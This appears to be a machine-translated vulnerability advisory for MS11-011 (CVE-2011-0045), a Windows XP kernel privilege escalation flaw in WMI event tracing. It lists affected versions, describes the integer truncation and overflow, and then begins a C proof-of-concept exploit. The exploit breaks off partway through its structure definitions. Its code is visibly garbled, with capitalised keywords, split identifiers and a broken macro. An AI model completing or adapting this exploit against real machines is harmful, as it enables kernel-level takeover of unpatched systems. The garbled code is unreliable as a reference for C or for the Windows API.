Affected Versions:
Microsoft Windows XP Tablet PC Edition SP3
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional SP3
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP3
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Vulnerability description:
Windows is a very popular operating system released by Microsoft.
Windows Kernel has the Local Privilege Escalation Vulnerability. Attackers can exploit this vulnerability to execute arbitrary code with the minimum privilege to completely control the affected computers.
This vulnerability is caused by the support of Kernel for event tracking. Due to malformed conversion, the Kernel allocates the truncated length to the data in the user space. When this buffer is filled, the Kernel uses another length that causes the buffer overflow. This causes memory corruption and arbitrary code execution.
<* Reference
Http://www.zerodayinitiative.com/advisories/ZDI-11-064/
*>
Std_logic () provides the following test methods:
/*
# Exploit Title: MS11-011 (CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC
# Date: 2011-03-01
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link:
# Version: prior to MS11-011
# Tested on: Win XP SP3
# CVE: CVE-2011-0045
# Status: Patched
# Binary Analysis: html "> http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
*/
# Include <windows. h>
# Include <stdio. h>
# Include <conio. h>
# Include <strsafe. h>
# Include <wmistr. h>
# Include <evntrace. h>
# Define WmiTraceMessageCode 40
# Define WmiCreateUMLogger 84
# Define WmiStartLoggerCode 32
# Define IOCTL_WMI_TRACE_MESSAGE
CTL_CODE (FILE_DEVICE_UNKNOWN, WmiTraceMessageCode,
METHOD_NEITHER, FILE_WRITE_ACCESS)
/*
# Define CTL_CODE (DeviceType, Function, Method, Access )(
(DeviceType) <16) | (Access) <14) | (Function) <2) | (Method)
)
# Define IOCTL_WMI_TRACE_MESSAGE
CTL_CODE (FILE_DEVICE_UNKNOWN, WmiTraceMessageCode,
METHOD_NEITHER, FILE_WRITE_ACCESS)
# Define IOCTL_WMI_CREATE_UM_LOGGER CTL_CODE (FILE_DEVICE_UNKNOWN,
WmiCreateUMLogger, METHOD_BUFFERED, FILE_READ_ACCESS)
# Define IOCTL_WMI_START_LOGGER
CTL_CODE (FILE_DEVICE_UNKNOWN, WmiStartLoggerCode,
METHOD_BUFFERED, FILE_ANY_ACCESS)
Typedef struct _ UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
Typedef UNICODE_STRING * PUNICODE_STRING;
Typedef struct _ STRING64 {
USHORT Length;
USHORT MaximumLength;
ULONGLONG Buffer;
} STRING64;
Typedef STRING64 * PSTRING64;
Typedef STRING64 UNICODE_STRING64;
Typedef UNICODE_STRING64 * PUNICODE_STRING64;
//
// WNODE definition
Typedef struct _ WNODE_HEADER
{
ULONG BufferSize; // Size of entire buffer sort sive of this
ULONG
ULONG ProviderId; // Provider Id of driver returning this buffer
Union
{
ULONG64 HistoricalContext; // Logger use
Struct
{
ULONG Version; // Reserved
ULONG Linkage; // Linkage field reserved for WMI
};
};
Union
{
ULONG CountLost; // Reserved
HANDLE KernelHandle; // Kernel handle for data block
LARGE_INTEGER TimeStamp; // Timestamp as returned in units of 100ns
// Since 1/1/1601
};
GUID Guid; // Guid for data block returned with results
ULONG ClientContext;
ULONG Flags; // Flags, see below
} WNODE_HEADER, * PWNODE_HEADER;
//
// Logger configuration and running statistics. This structure is used
// By WMI. DLL to convert to UNICODE_STRING
//
// Begin_wmikm
Typedef struct _ WMI_LOGGER_INFORMATION {
WNODE_HEADER Wnode; // Had to do this since wmium. h comes later
//
// Data provider by caller
ULONG BufferSize; // buffer size for logging (in
Kbytes)
ULONG MinimumBuffers; // minimum to preallocate
ULONG MaximumBuffers; // maximum buffers allowed
ULONG MaximumFileSize; // maximum logfile size (in MBytes)
ULONG LogFileMode; // sequential, circular
ULONG FlushTimer; // buffer flush timer, in seconds
ULONG EnableFlags; // trace enable flags
LONG AgeLimit; // aging decay time, in minutes
ULONG Wow; // TRUE if the logger started
Under WOW64
Union {
HANDLE LogFileHandle; // handle to logfile
&